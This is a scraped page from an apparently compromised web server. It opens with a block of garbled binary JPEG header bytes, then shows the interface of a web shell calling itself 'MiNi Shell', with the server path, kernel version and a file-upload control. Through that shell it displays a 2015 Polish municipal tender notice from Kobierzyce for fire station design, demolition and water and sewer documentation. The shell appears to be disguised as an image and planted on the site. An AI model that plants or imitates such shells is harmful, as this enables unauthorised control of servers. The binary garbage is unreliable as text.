JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151214/341546-N-2015.html

<p class="kh_header"><b>Kobierzyce: Opracowanie dokumentacji projektowej na:
1) Budowę Remizy strażackiej w Pustkowie Żurawskim;
2) Rozbiórkę istniejących budynków remizy i garaży;
3) Budowę sieci wod-kan zgodnie z warunkami technicznymi;
oraz pełnienie nadzoru autorskiego - II POSTĘPOWANIE</b><br>
<b>Numer ogłoszenia: 341546 - 2015; data zamieszczenia: 14.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na:
1) Budowę Remizy strażackiej w Pustkowie Żurawskim;
2) Rozbiórkę istniejących budynków remizy i garaży;
3) Budowę sieci wod-kan zgodnie z warunkami technicznymi;
oraz pełnienie nadzoru autorskiego - II POSTĘPOWANIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Wykonanie pełnobranżowej dokumentacji projektowej na:
a) Budowę Remizy strażackiej w Pustkowie Żurawskim, dz. nr 5/14, wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę,
b) Rozbiórkę istniejących budynków starej remizy wraz z garażami oraz uzyskanie pozwolenia na rozbiórkę lub oświadczenia właściwego starostwa o nie wniesieniu sprzeciwu do robót rozbiórkowych,
c) Budowę sieci wod-kan w ul. Kolejowej zgonie z wydanymi warunkami wraz  z uzyskaniem ostatecznego pozwolenia na budowę, oraz pełnienie nadzoru autorskiego.
2.	Zakładana charakterystyka projektowanego obiektu Remizy strażackiej w Pustkowie Żurawskim:
Zamawiający opracował koncepcję programowo - przestrzenną (załącznik nr 1 do SIWZ), w której zostały opisane planowane do zaprojektowania elementy. 
Powyższa koncepcja była już przedmiotem analiz i konsultacji społecznych. Jednakże z uwagi na fakt, iż została ona opracowana wyłącznie jako materiał wyjściowy Wykonawca winien szczegółowo przeanalizować wykonalność (w tym w oparciu o poszczególne aktualne przepisy) i zasadność poszczególnych rozwiązań oraz dokonać ostatecznych konsultacji z przedstawicielami OSP Pustków Żurawski oraz z właściwym pracownikiem Urzędu Gminy Kobierzyce, a następnie przedstawić Zamawiającemu do akceptacji koncepcję ostateczną. Po uzyskaniu tej akceptacji Wykonawca przystąpi do realizacji dokumentacji projektowej.
Ponadto Projektant winien ująć w wycenie projekty wszelkich instalacji wewnętrznych zewnętrznych (np. oświetlenie terenu), w tym instalacje niestandardowe jak sieci niskoprądowe: telefoniczna, komputerowa, łączności radiowej, wentylacji mechanicznej i klimatyzacji. Należy zaprojektować i odpowiednio opisać (w sposób zapewniający wymaganą jakość po przeprowadzeniu procedury przetargowej na dostawy) wyposażenia w meble, dokonując konsultacji także i w tym zakresie z użytkownikiem i zamawiającym.
Zamawiający dopuszcza korekty w stosunku do proponowanej koncepcji programowo - przestrzennej za jego zgodą jeśli specyfika budynku będzie to uzasadniać. 
3.	Do wykonawcy zamówienia należy:

3.1	Uzyskanie niezbędnych do realizacji zamówienia map, warunków, uzgodnień, decyzji, postanowień, wypisów, wyrysów itp. i dokonanie płatności za ich uzyskanie. Opłata przyłączeniowa za dostarczenie energii elektrycznej, wynikająca z umowy przyłączeniowej, dokonana będzie przez Zamawiającego.
3.2	Składanie w imieniu Zamawiającego związanych z realizowanym projektem wniosków wraz z dokumentacją. Koszty z tym związane winne być ujęte w ofercie Wykonawcy.
3.3	Opracowanie w wersji elektronicznej oświadczenia inwestora o prawie do dysponowania nieruchomością na cele budowlane załączając komplet potwierdzających to prawo, uprzednio uzyskanych dokumentów.
3.4	Pełnienie nadzoru autorskiego w okresie realizacji robót budowlanych za odrębnym, ustalonym w ofercie przetargowej wynagrodzeniem. W ramach nadzoru wymagany będzie udział w naradach roboczych, radach budowy, odbiorach itp. Przewiduje się do 15 wizyt na placu budowy. Pełnienie nadzoru autorskiego będzie świadczone na podstawie odrębnej umowy oraz na warunkach opisanych w Załączniku nr 10 do SIWZ.
3.5	Udzielenie odpowiedzi, wyjaśnień na pytania zadawane przez uczestników postępowania na etapie późniejszego wyboru Wykonawcy robót budowlanych w oparciu o opracowaną dokumentację projektową.  
3.6	Przekazywanie na żądanie Zamawiającego pisemnej informacji o stanie zaawansowania prac projektowych, a ponadto do uczestniczenia w spotkaniach konsultacyjnych z udziałem Zamawiającego i przedstawicieli lokalnej społeczności - w tym Rady Sołeckiej i Radnych Gminy Kobierzyce.
3.7	Uzyskanie uzgodnienia projektu od Zamawiającego przed złożeniem wniosku o pozwolenie na budowę.
3.8	 Dokonywanie aktualizacji kosztorysu inwestorskiego, jeśli będzie to wymagane, w oparciu o aktualne składniki cenotwórcze i dostarczenie ich na żądanie Zamawiającego w terminie do dwóch lat od zakończenia realizacji zamówienia.
4.	Opracowana dokumentacja winna zawierać:
a)	Budowa Remizy strażackiej w Pustkowie Żurawskim:
ostateczna koncepcji funkcjonalno - przestrzenna, 
projekt budowlany 6 egz. (2 egz. dla Starostwa Powiatowego + 4 egz. dla Zamawiającego, w tym 2 egz. z oryginalnymi pieczątkami organów wydających pozwolenie na budowę), zaopatrzony w oświadczenie o kompletności i dokonane uzgodnienia, w tym w zakresie sanitarno- epidemiologicznym, ochrony przeciwpożarowej oraz bezpieczeństwa i higieny pracy oraz inne uzgodnienia niezbędne do uzyskania pozwolenia na budowę,
ostateczne pozwolenie na budowę,
projekt wykonawczy dla każdej z branż (elektryczna, sanitarna, architektoniczna, konstrukcyjna i teletechniczna) (4 egz.) w tym projekt aranżacji wnętrz (m.in. umeblowanie pomieszczeń, wyposażenie), 
specyfikacja techniczna wykonania i odbioru robót budowlanych (1 egz.),
kosztorys inwestorski ( 1szt.) ,
przedmiar robót ( 1 szt.), 
inne opracowania niezbędne do realizacji zamówienia, jak np.: inwentaryzacja zieleni, operat dendrologiczny, projekt organizacji ruchu zastępczego i docelowego, operat wodno prawny, opracowania branżowe, rozwiązania kolizji z istniejącą infrastrukturą (2 egz. + egzemplarze wymagane przez odpowiednie organy),
wersja elektroniczna całej papierowej dokumentacji projektowej: w formacie PDF wraz ze skanem pieczątek, zgód i podpisów projektantów, oraz w formacie DWG. 

b)	Rozbiórka istniejących budynków starej remizy wraz z garażami: 
(Zamawiający nie dysponuje dokumentacją projektową istniejącej remizy, stąd wszelkie wymagane dokumenty należy pozyskać w ramach zamówienia i ująć w kosztach)
projekt rozbiórki (4 szt.) zawierający m.in. szkic usytuowania obiektu budowlanego opis zakresu i sposobu prowadzenia robót rozbiórkowych, opis sposobu zapewnienia bezpieczeństwa ludzi i mienia, pozwolenia, uzgodnienia lub opinie innych organów, a także inne dokumenty, wymagane przepisami szczególnymi wraz z uzyskaniem na rzecz Zamawiającego ostatecznego pozwolenia na rozbiórkę (lub oświadczenia właściwego starostwa o nie wniesieniu sprzeciwu do robót rozbiórkowych),
specyfikacja techniczna wykonania i odbioru robót (1szt.),
kosztorys inwestorski ( 1szt.), 
przedmiar robót ( 1 szt.), 
w celu opracowania dokumentacji należy odbyć wizję lokalną w terenie,
wersja elektroniczna całej papierowej dokumentacji projektowej: w formacie PDF wraz ze skanem pieczątek, zgód i podpisów projektantów, oraz w formacie DWG. 

c)	Budowa sieci wod-kan w ul. Kolejowej zgonie z wydanymi warunkami
ostateczna koncepcji funkcjonalno - przestrzenna, 
projekt budowlany 6 egz.( 2 egz. dla Starostwa Powiatowego + 4 egz. dla Zamawiającego w tym 2 egz. z oryginalnymi pieczątkami organów wydających pozwolenie na budowę), zaopatrzony w oświadczenie o kompletności i dokonane uzgodnienia, w tym m. in. w zakresie sanitarno- epidemiologicznym, ochrony przeciwpożarowej oraz bezpieczeństwa i higieny pracy,
ostateczne pozwolenie na budowę,
projekt wykonawczy dla każdej z branż (wodociągowo-kanalizacyjna i drogowa jeżeli wymagane) (4 egz.), w tym projekt aranżacji wnętrz zawierający min.: rzut pomieszczeń z rozrysowaniem ścian działowych oraz wyposażenia, opisem technicznym i materiałowym: mebli, ceramiki łazienkowej, sprzętu AGD, kolorystykę pomieszczeń. Projektant powinien pokazać w katalogach, jakie meble oraz wielkości proponuje. 
specyfikacja technicznych wykonania i odbioru robót budowlanych (1 egz.),
kosztorys inwestorski (1szt.), 
przedmiar robót (1 szt.), 
inne opracowania niezbędne do realizacji zamówienia, jak np.: inwentaryzacja zieleni, operat dendrologiczny, projekt organizacji ruchu zastępczego i docelowego, operat wodno prawny, opracowania branżowe, rozwiązania kolizji z istniejącą infrastrukturą (2 egz. + egzemplarze wymagane przez odpowiednie organy),
wersja elektroniczna całej papierowej dokumentacji projektowej: w formacie PDF wraz ze skanem pieczątek, zgód i podpisów projektantów, oraz w formacie DWG. 
5.	Opracowana dokumentacja musi być zgodna z wymogami: 
Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129 j.t. ze zm.),
Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r., nr 130 poz. 1389 ze zm.)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>do wartości max. przewidzianej w PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.30.00-7, 71.22.10.00-3, 71.24.20.00-6, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga wykazania spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna wykazanie wykonanej, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                 w tym okresie, usługi obejmującej:
- min. 1 usługę  realizacji  pełnobranżowej dokumentacji projektowej budowy obiektu należącego do 126 grupy Polskiej Klasyfikacji Obiektów Budowlanych o kubaturze min. 1.500,00 m3, na podstawie której uzyskano pozwolenie na budowę 
oraz
- min. 1 usługę  realizacji dokumentacji projektowej na budowę sieci wod-kan o min. długości 100 m na podstawie której uzyskano pozwolenie na budowę 

wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna dysponowanie co najmniej:
1 osobą - projektantem posiadającym uprawnienia projektowe w specjalności architektonicznej, 
1 osobą - projektantem posiadającym uprawnienia projektowe w specjalności konstrukcyjno - budowlanej, 
1 osobą - projektantem posiadającym uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
1 osobą - projektantem posiadającym uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 


Wszystkie powyższe osoby winny posiadać: uprawnienia wymagane przepisami ustawy           z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r., poz. 1409 j.t. ze zm.)  lub równoważne inne uprawnienia wydane na podstawie przepisów prawa obowiązujących w krajach Unii Europejskiej.
Odnośnie w/w uprawnień, Zamawiający dopuszcza ważne uprawnienia budowlane - wydane na podstawie uprzednio obowiązujących przepisów, odpowiednio w zakresie niezbędnym do wykonania przedmiotu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna udokumentowanie posiadania:
-	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 50.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - ilośc aktualizacji kosztorysu inwestorskiego - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla Stron postanowienia określa projekt umowy stanowiący załącznik do niniejszej Specyfikacji.
Zamawiający informuje, że ustala się następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy:
1) zmiana terminu realizacji zamówienia z  przyczyn nie leżących po stronie Wykonawcy, w przypadku :
uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji zamówienia w związku z szybszym wykonaniem przez Wykonawcę,
kiedy warunki projektowania zostaną zmienione przez jednostki opiniujące, uzgadniające lub gdy Zamawiający w istotnym stopniu zmieni koncepcję przyjętych rozwiązań projektowych lub gdy nastąpi zmiana przepisów i normatywów,
kiedy jednostki uzgadniające lub zatwierdzające przedłużą termin swoich czynności ponad przewidziane prawem terminy,
kiedy zaistnieje konieczność rozpatrzenia istotnych uwag złożonych do projektu 
kiedy zaistnieje konieczność analizy i ujęcia innych niż zakładano w koncepcji lub już rozpoczętym projekcie rozwiązań projektowych dla całego obiektu. Dotyczy to w szczególności:
- zapewnienia dostępności toalet w odpowiedniej ilości,
- przeprojektowania instalacji,
- zapewnienia dostępności obiektu dla osób niepełnosprawnych (Uwaga rozwiązania może wymagać przejazd z windy na poziom drugiego piętra - obecnie w wyniku różnicy poziomów są tam dwa stopnie schodowe),
- pozyskania ew. zgód na odstępstwo od warunków technicznych,
z przyczyn zależnych od Zamawiającego, nieprzewidzianych oraz niezawinionych przez Wykonawcę, których nie można było przewidzieć na etapie sporządzania dokumentacji przetargowej,
działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mające bezpośredni wpływ na terminowość wykonania robót,
wprowadzenia zmian w dokumentacji i realizacji wykonawczej tych zmian w terminie uniemożliwiającym dotrzymanie pierwotnego terminu umownego,
przerw w realizacji robót, powstałych z przyczyn niezależnych od Wykonawcy, 
przedłużających się robót budowlanych wykonywanych na podstawie przedmiotowej dokumentacji projektowej, strony przedłużą termin realizacji nadzoru autorskiego;

2) zmiana osób: odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy lub osób przewidzianych do realizacji zamówienia. Osoby wskazane w umowie muszą spełniać warunki wymagane przez SIWZ;
3) zmiana nazwy, siedziby stron umowy, numerów kont bankowych, wskazanych osób realizujących zamówienie, osób do kontaktów pomiędzy stronami umowy oraz innych danych identyfikacyjnych;
4) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
